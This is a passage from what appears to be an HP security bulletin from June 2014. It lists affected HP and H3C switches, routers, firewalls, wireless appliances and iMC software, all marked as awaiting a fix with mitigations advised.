5900v VMware E-LTU\n\n5830 Switch Series\n Fix in progress\nuse mitigations\n JC691A HP A5830AF-48G Switch w/1 Interface Slot\nJC694A HP A5830AF-96G Switch\nJG316A HP 5830AF-48G TAA Switch w/1 Intf Slot\nJG374A HP 5830AF-96G TAA Switch\n\n5820 Switch Series\n Fix in progress\nuse mitigations\n JC102A HP 5820-24XG-SFP+ Switch\nJC106A HP 5820-14XG-SFP+ Switch with 2 Slots\nJG219A HP 5820AF-24XG Switch\nJG243A HP 5820-24XG-SFP+ TAA-compliant Switch\nJG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots\n H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media\nmodules Plus OSM (0235A37L)\nH3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T\n(RJ45) (0235A370)\n\n5800 Switch Series\n Fix in progress\nuse mitigations\n JC099A HP 5800-24G-PoE Switch\nJC100A HP 5800-24G Switch\nJC101A HP 5800-48G Switch with 2 Slots\nJC103A HP 5800-24G-SFP Switch\nJC104A HP 5800-48G-PoE Switch\nJC105A HP 5800-48G Switch\nJG225A HP 5800AF-48G Switch\nJG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots\nJG254A HP 5800-24G-PoE+ TAA-compliant Switch\nJG255A HP 5800-24G TAA-compliant Switch\nJG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt\nJG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot\nJG258A HP 5800-48G TAA Switch w 1 Intf Slot\n H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot\n(0235A36U)\nH3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X\n(SFP Plus ) Plus 1 media module PoE (0235A36S)\nH3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus\nmedia module (no power) (0235A374)\nH3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus\n) Plus media module (0235A379)\nH3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module\n(0235A378)\nH3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM\n(0235A36W)\n\n5500 HI Switch Series\n Fix in progress\nuse mitigations\n JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch\nJG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch\nJG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt\nJG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt\nJG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt\nJG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt\nJG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt\nJG681A HP 5500-24G-SFP HI TAA Swch w/2Slt\n\n5500 EI Switch Series\n Fix in progress\nuse mitigations\n JD373A HP 5500-24G DC EI Switch\nJD374A HP 5500-24G-SFP EI Switch\nJD375A HP 5500-48G EI Switch\nJD376A HP 5500-48G-PoE EI Switch\nJD377A HP 5500-24G EI Switch\nJD378A HP 5500-24G-PoE EI Switch\nJD379A HP 5500-24G-SFP DC EI Switch\nJG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts\nJG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts\nJG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts\nJG250A HP 5500-24G EI TAA Switch w 2 Intf Slts\nJG251A HP 5500-48G EI TAA Switch w 2 Intf Slts\nJG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts\nJG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts\n H3C S5500-28C-EI Ethernet Switch (0235A253)\nH3C S5500-28F-EI Eth Switch AC Single (0235A24U)\nH3C S5500-52C-EI Ethernet Switch (0235A24X)\nH3C S5500-28C-EI-DC Ethernet Switch (0235A24S)\nH3C S5500-28C-PWR-EI Ethernet Switch (0235A255)\nH3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259)\nH3C S5500-52C-PWR-EI Ethernet Switch (0235A251)\n\n5500 SI Switch Series\n Fix in progress\nuse mitigations\n JD369A HP 5500-24G SI Switch\nJD370A HP 5500-48G SI Switch\nJD371A HP 5500-24G-PoE SI Switch\nJD372A HP 5500-48G-PoE SI Switch\nJG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts\nJG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts\n H3C S5500-28C-SI Ethernet Switch (0235A04U)\nH3C S5500-52C-SI Ethernet Switch (0235A04V)\nH3C S5500-28C-PWR-SI Ethernet Switch (0235A05H)\nH3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)\n\n5120 EI Switch Series\n Fix in progress\nuse mitigations\n JE066A HP 5120-24G EI Switch\nJE067A HP 5120-48G EI Switch\nJE068A HP 5120-24G EI Switch with 2 Slots\nJE069A HP 5120-48G EI Switch with 2 Slots\nJE070A HP 5120-24G-PoE EI Switch with 2 Slots\nJE071A HP 5120-48G-PoE EI Switch with 2 Slots\nJG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts\nJG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts\nJG245A HP 5120-24G EI TAA Switch w 2 Intf Slts\nJG246A HP 5120-48G EI TAA Switch w 2 Intf Slts\nJG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts\nJG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts\n H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ)\nH3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS)\nH3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR)\nH3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT)\nH3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU)\nH3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)\n\n5120 SI switch Series\n Fix in progress\nuse mitigations\n JE072A HP 5120-48G SI Switch\nJE073A HP 5120-16G SI Switch\nJE074A HP 5120-24G SI Switch\nJG091A HP 5120-24G-PoE+ (370W) SI Switch\nJG092A HP 5120-24G-PoE+ (170W) SI Switch\n H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W)\nH3C S5120-20P-SI L2\n16GE Plus 4SFP (0235A42B)\nH3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D)\nH3C S5120-28P-HPWR-SI (0235A0E5)\nH3C S5120-28P-PWR-SI (0235A0E3)\n\n4800 G Switch Series\n Fix in progress\nuse mitigations\n JD007A HP 4800-24G Switch\nJD008A HP 4800-24G-PoE Switch\nJD009A HP 4800-24G-SFP Switch\nJD010A HP 4800-48G Switch\nJD011A HP 4800-48G-PoE Switch\n\n 3Com Switch 4800G 24-Port (3CRS48G-24-91)\n3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91)\n3Com Switch 4800G 48-Port (3CRS48G-48-91)\n3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91)\n3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)\n\n4510G Switch Series\n Fix in progress\nuse mitigations\n JF428A HP 4510-48G Switch\nJF847A HP 4510-24G Switch\n\n 3Com Switch 4510G 48 Port (3CRS45G-48-91)\n3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91)\n3Com Switch E4510-24G (3CRS45G-24-91)\n\n4210G Switch Series\n Fix in progress\nuse mitigations\n JF844A HP 4210-24G Switch\nJF845A HP 4210-48G Switch\nJF846A HP 4210-24G-PoE Switch\n\n 3Com Switch 4210-24G (3CRS42G-24-91)\n3Com Switch 4210-48G (3CRS42G-48-91)\n3Com Switch E4210-24G-PoE (3CRS42G-24P-91)\n\n3610 Switch Series\n Fix in progress\nuse mitigations\n JD335A HP 3610-48 Switch\nJD336A HP 3610-24-4G-SFP Switch\nJD337A HP 3610-24-2G-2G-SFP Switch\nJD338A HP 3610-24-SFP Switch\n H3C S3610-52P - model LS-3610-52P-OVS (0235A22C)\nH3C S3610-28P - model LS-3610-28P-OVS (0235A22D)\nH3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E)\nH3C S3610-28F - model LS-3610-28F-OVS (0235A22F)\n\n3600 V2 Switch Series\n Fix in progress\nuse mitigations\n JG299A HP 3600-24 v2 EI Switch\nJG300A HP 3600-48 v2 EI Switch\nJG301A HP 3600-24-PoE+ v2 EI Switch\nJG301B HP 3600-24-PoE+ v2 EI Switch\nJG302A HP 3600-48-PoE+ v2 EI Switch\nJG302B HP 3600-48-PoE+ v2 EI Switch\nJG303A HP 3600-24-SFP v2 EI Switch\nJG304A HP 3600-24 v2 SI Switch\nJG305A HP 3600-48 v2 SI Switch\nJG306A HP 3600-24-PoE+ v2 SI Switch\nJG306B HP 3600-24-PoE+ v2 SI Switch\nJG307A HP 3600-48-PoE+ v2 SI Switch\nJG307B HP 3600-48-PoE+ v2 SI Switch\n\n3100V2\n Fix in progress\nuse mitigations\n JD313B HP 3100-24-PoE v2 EI Switch\nJD318B HP 3100-8 v2 EI Switch\nJD319B HP 3100-16 v2 EI Switch\nJD320B HP 3100-24 v2 EI Switch\nJG221A HP 3100-8 v2 SI Switch\nJG222A HP 3100-16 v2 SI Switch\nJG223A HP 3100-24 v2 SI Switch\n\n3100V2-48\n Fix in progress\nuse mitigations\n JG315A HP 3100-48 v2 Switch\n\n1910\n Fix in progress\nuse mitigations\n JE005A HP 1910-16G Switch\nJE006A HP 1910-24G Switch\nJE007A HP 1910-24G-PoE (365W) Switch\nJE008A HP 1910-24G-PoE(170W) Switch\nJE009A HP 1910-48G Switch\nJG348A HP 1910-8G Switch\nJG349A HP 1910-8G-PoE+ (65W) Switch\nJG350A HP 1910-8G-PoE+ (180W) Switch\n 3Com Baseline Plus Switch 2900 Gigabit Family - 52 port (3CRBSG5293)\n3Com Baseline Plus Switch 2900G - 20 port (3CRBSG2093)\n3Com Baseline Plus Switch 2900G - 28 port (3CRBSG2893)\n3Com Baseline Plus Switch 2900G - 28HPWR (3CRBSG28HPWR93)\n3Com Baseline Plus Switch 2900G - 28PWR (3CRBSG28PWR93)\n\n1810v1 P2\n Fix in progress\nuse mitigations\n J9449A HP 1810-8G Switch\nJ9450A HP 1810-24G Switch\n\n1810v1 PK\n Fix in progress\nuse mitigations\n J9660A HP 1810-48G Switch\n\nMSR20\n Fix in progress\nuse mitigations\n JD432A HP A-MSR20-21 Multi-Service Router\nJD662A HP MSR20-20 Multi-Service Router\nJD663A HP MSR20-21 Multi-Service Router\nJD663B HP MSR20-21 Router\nJD664A HP MSR20-40 Multi-Service Router\nJF228A HP MSR20-40 Router\nJF283A HP MSR20-20 Router\n H3C RT-MSR2020-AC-OVS-H3C (0235A324)\nH3C RT-MSR2040-AC-OVS-H3 (0235A326)\nH3C MSR 20-20 (0235A19H)\nH3C MSR 20-21 (0235A325)\nH3C MSR 20-40 (0235A19K)\nH3C MSR-20-21 Router (0235A19J)\n\nMSR20-1X\n Fix in progress\nuse mitigations\n JD431A HP MSR20-10 Router\nJD667A HP MSR20-15 IW Multi-Service Router\nJD668A HP MSR20-13 Multi-Service Router\nJD669A HP MSR20-13 W Multi-Service Router\nJD670A HP MSR20-15 A Multi-Service Router\nJD671A HP MSR20-15 AW Multi-Service Router\nJD672A HP MSR20-15 I Multi-Service Router\nJD673A HP MSR20-11 Multi-Service Router\nJD674A HP MSR20-12 Multi-Service Router\nJD675A HP MSR20-12 W Multi-Service Router\nJD676A HP MSR20-12 T1 Multi-Service Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\nJG209A HP MSR20-12-T-W Router (NA)\nJG210A HP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\nH3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-11 (0235A31V)\nH3C MSR 20-12 (0235A32E)\nH3C MSR 20-12 T1 (0235A32B)\nH3C MSR 20-13 (0235A31W)\nH3C MSR 20-13 W (0235A31X)\nH3C MSR 20-15 A (0235A31Q)\nH3C MSR 20-15 A W (0235A31R)\nH3C MSR 20-15 I (0235A31N)\nH3C MSR 20-15 IW (0235A31P)\nH3C MSR20-12 W (0235A32G)\n\nMSR30\n Fix in progress\nuse mitigations\n JD654A HP MSR30-60 POE Multi-Service Router\nJD657A HP MSR30-40 Multi-Service Router\nJD658A HP MSR30-60 Multi-Service Router\nJD660A HP MSR30-20 POE Multi-Service Router\nJD661A HP MSR30-40 POE Multi-Service Router\nJD666A HP MSR30-20 Multi-Service Router\nJF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF232A HP RT-MSR3040-AC-OVS-AS-H3\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S)\nH3C MSR 30-20 (0235A19L)\nH3C MSR 30-20 POE (0235A239)\nH3C MSR 30-40 (0235A20J)\nH3C MSR 30-40 POE (0235A25R)\nH3C MSR 30-60 (0235A20K)\nH3C MSR 30-60 POE (0235A25S)\nH3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)\n\nMSR30-16\n Fix in progress\nuse mitigations\n JD659A HP MSR30-16 POE Multi-Service Router\nJD665A HP MSR30-16 Multi-Service Router\nJF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\nH3C MSR 30-16 (0235A237)\nH3C MSR 30-16 POE (0235A238)\n\nMSR30-1X\n Fix in progress\nuse mitigations\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\nH3C RT-MSR3011-AC-OVS-H3 (0235A29L)\n\nMSR50\n Fix in progress\nuse mitigations\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\n\nMSR50-G2\n Fix in progress\nuse mitigations\n JD429A HP MSR50 G2 Processor Module\nJD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q)\nH3C MSR 50 High Performance Main Processing Unit 3GE (Combo)\n256F/1GD(0231A0KL)\n\nMSR20 Russian version\n Fix in progress\nuse mitigations\n JD663B HP MSR20-21 Router\nJF228A HP MSR20-40 Router\nJF283A HP MSR20-20 Router\n H3C RT-MSR2020-AC-OVS-H3C (0235A324)\nH3C RT-MSR2040-AC-OVS-H3 (0235A326)\n\nMSR20-1X Russian version\n Fix in progress\nuse mitigations\n JD431A HP MSR20-10 Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\n\nMSR30 Russian version\n Fix in progress\nuse mitigations\n JF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n\nMSR30-1X Russian version\n Fix in progress\nuse mitigations\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L)\nH3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\n\nMSR30-16 Russian version\n Fix in progress\nuse mitigations\n JF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n\nMSR50 Russian version\n Fix in progress\nuse mitigations\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR 50 Processor Module (0231A791)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\n\nMSR50 G2 Russian version\n Fix in progress\nuse mitigations\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n\nMSR9XX\n Fix in progress\nuse mitigations\n JF812A HP MSR900 Router\nJF813A HP MSR920 Router\nJF814A HP MSR900-W Router\nJF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr\nJG207A HP MSR900-W Router (NA)\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2)\nH3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX)\nH3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)\nH3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n\nMSR9XX Russian version\n Fix in progress\nuse mitigations\n JF812A HP MSR900 Router\nJF813A HP MSR920 Router\nJF814A HP MSR900-W Router\nJF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr\n H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX)\nH3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\nH3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2)\nH3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)\n\nMSR93X\n Fix in progress\nuse mitigations\n JG511A HP MSR930 Router\nJG512A HP MSR930 Wireless Router\nJG513A HP MSR930 3G Router\nJG514A HP MSR931 Router\nJG515A HP MSR931 3G Router\nJG516A HP MSR933 Router\nJG517A HP MSR933 3G Router\nJG518A HP MSR935 Router\nJG519A HP MSR935 Wireless Router\nJG520A HP MSR935 3G Router\nJG531A HP MSR931 Dual 3G Router\nJG596A HP MSR930 4G LTE/3G CDMA Router\nJG597A HP MSR936 Wireless Router\nJG665A HP MSR930 4G LTE/3G WCDMA Global Router\nJG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n\nMSR93X Russian version\n Fix in progress\nuse mitigations\n JG511A HP MSR930 Router\nJG512A HP MSR930 Wireless Router\nJG513A HP MSR930 3G Router\nJG514A HP MSR931 Router\nJG515A HP MSR931 3G Router\nJG516A HP MSR933 Router\nJG517A HP MSR933 3G Router\nJG518A HP MSR935 Router\nJG519A HP MSR935 Wireless Router\nJG520A HP MSR935 3G Router\nJG531A HP MSR931 Dual 3G Router\nJG596A HP MSR930 4G LTE/3G CDMA Router\nJG597A HP MSR936 Wireless Router\nJG665A HP MSR930 4G LTE/3G WCDMA Global Router\nJG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n\nMSR1000\n Fix in progress\nuse mitigations\n JG732A HP MSR1003-8 AC Router\n\nMSR2000\n Fix in progress\nuse mitigations\n JG411A HP MSR2003 AC Router\n\nMSR3000\n Fix in progress\nuse mitigations\n JG404A HP MSR3064 Router\nJG405A HP MSR3044 Router\nJG406A HP MSR3024 AC Router\nJG409A HP MSR3012 AC Router\nJG861A HP MSR3024 TAA-compliant AC Router\n\nMSR4000\n Fix in progress\nuse mitigations\n JG402A HP MSR4080 Router Chassis\nJG403A HP MSR4060 Router Chassis\nJG412A HP MSR4000 MPU-100 Main Processing Unit\n\nF5000\n Fix in progress\nuse mitigations\n JG216A HP F5000 Firewall Standalone Chassis\nJD259A HP A5000-A5 VPN Firewall Chassis\n H3C SecPath F5000-A5 Host System (0150A0AG)\n\nU200S and CS\n Fix in progress\nuse mitigations\n JD268A HP 200-CS UTM Appliance\nJD273A HP U200-S UTM Appliance\n H3C SecPath U200-S (0235A36N)\n\nU200A and M\n Fix in progress\nuse mitigations\n JD274A HP 200-M UTM Appliance\nJD275A HP U200-A UTM Appliance\n H3C SecPath U200-A (0235A36Q)\n\nF1000A and S\n Fix in progress\nuse mitigations\n JD270A HP S1000-S VPN Firewall Appliance\nJD271A HP S1000-A VPN Firewall Appliance\nJG213A HP F1000-S-EI VPN Firewall Appliance\nJG214A HP F1000-A-EI VPN Firewall Appliance\n\nSecBlade FW\n Fix in progress\nuse mitigations\n JC635A HP 12500 VPN Firewall Module\nJD245A HP 9500 VPN Firewall Module\nJD249A HP 10500/7500 Advanced VPN Firewall Mod\nJD250A HP 6600 Firewall Processing Rtr Module\nJD251A HP 8800 Firewall Processing Module\nJD255A HP 5820 VPN Firewall Module\n H3C S9500E SecBlade VPN Firewall Module (0231A0AV)\nH3C S7500E SecBlade VPN Firewall Module (0231A832)\nH3C SR66 Gigabit Firewall Module (0231A88A)\nH3C SR88 Firewall Processing Module (0231A88L)\nH3C S5820 SecBlade VPN Firewall Module (0231A94J)\n\nF1000E\n Fix in progress\nuse mitigations\n JD272A HP S1000-E VPN Firewall Appliance\n\nVSR1000\n Fix in progress\nuse mitigations\n JG810AAE HP VSR1001 Virtual Services Router\nJG811AAE HP VSR1001 Virtual Services Router\nJG812AAE HP VSR1004 Virtual Services Router\nJG813AAE HP VSR1008 Virtual Services Router\n\nWX5002/5004\n Fix in progress\nuse mitigations\n JD441A HP 5800 ACM for 64-256 APs\nJD447B HP WX5002 Access Controller\nJD448A HP A-WX5004 Access Controller\nJD448B HP WX5004 Access Controller\nJD469A HP A-WX5004 (3Com) Access Controller\nJG261A HP 5800 Access Controller OAA TAA Mod\n\nHP 850/870\n Fix in progress\nuse mitigations\n JG723A HP 870 Unified Wired-WLAN Appliance\nJG725A HP 870 Unifd Wrd-WLAN TAA Applnc\n\nHP 830\n Fix in progress\nuse mitigations\n JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch\nJG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch\nJG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch\nJG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch\n\nHP 6000\n Fix in progress\nuse mitigations\n JG639A HP 10500/7500 20G Unified Wired-WLAN Mod\nJG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod\n\nM220\n Fix in progress\nuse mitigations\n J9798A HP M220 802.11n AM Access Point\nJ9799A HP M220 802.11n WW Access Point\n\nNGFW\n Fix in progress\nuse mitigations\n JC882A HP S1050F NGFW Aplnc w/DVLabs 1-yr Lic\nJC883A HP S3010F NGFW Aplnc w/DVLabs 1-yr Lic\nJC884A HP S3020F NGFW Aplnc w/DVLabs 1-yr Lic\nJC885A HP S8005F NGFW Aplnc w/DVLabs 1-yr Lic\nJC886A HP S8010F NGFW Aplnc w/DVLabs 1-yr Lic\n\niMC UAM 7.0\n Fix in progress\nuse mitigations\n JD144A HP IMC UAM S/W Module w/200-User License\nJF388A HP IMC UAM S/W Module w/200-user License\nJD435A HP IMC EAD Client Software\nJF388AAE HP IMC UAM S/W Module w/200-user E-LTU\nJG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU\n\niMC EAD 7.0\n Fix in progress\nuse mitigations\n JF391AAE HP IMC EAD S/W Module w/200-user E-LTU\nJG754AAE HP IMC EAD SW Module w/ 50-user E-LTU\nJD147A HP IMC Endpoint Admission Defense Software Module with 200-user\nLicense\nJF391A HP IMC EAD S/W Module w/200-user License\n\niMC PLAT 7.0\n Fix in progress\nuse mitigations\n JF377AAE HP IMC Standard Edition Software Platform with 100-node E-LTU\nJG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU\nJG747AAE HP IMC Standard Software Platform with 50-node E-LTU\nJG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU\nJD125A HP IMC Standard Edition Software Platform with 100-node License\nJD815A HP IMC Standard Edition Software Platform with 100-node License\nJD816A HP A-IMC Standard Edition Software DVD Media\nJF377A HP IMC Standard Edition Software Platform with 100-node License\nJF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU\nJF289AAE HP Enterprise Management System to Intelligent Management Center\nUpgrade E-LTU\nTJ635AAE HP IMC for ANM 50 node pack SW E-LTU (On HP Softwares CPL\nnot HPNs)\nJF378AAE HP IMC Enterprise Edition Software Platform with 200-Node E-LTU\nJG748AAE HP IMC Enterprise Software Platform with 50-node E-LTU\nJD126A HP A-IMC Enterprise Software Platform with 200-node License\nJD808A HP A-IMC Enterprise Software Platform with 200-node License\nJD814A HP A-IMC Enterprise Edition Software DVD Media\nJF378A HP IMC Enterprise Edition Software Platform with 200-node License\nJG546AAE HP IMC Basic SW Platform w/50-node E-LTU\nJG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\nJG550AAE HP PMM to IMC Bsc WLM Upgr w/150 AP E-LTU\nJG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU\nJG659AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU\nJG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU\nJG660AAE HP IMC Smart Connect w / WLAN Manager Virtual Appliance Edition\nE-LTU\nJG767AAE HP IMC Smart Connect with Wireless Service Manager Virtual Appliance\nSoftware E-LTU\n\nHISTORY\nVersion:1 (rev.1) - 20 June 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For 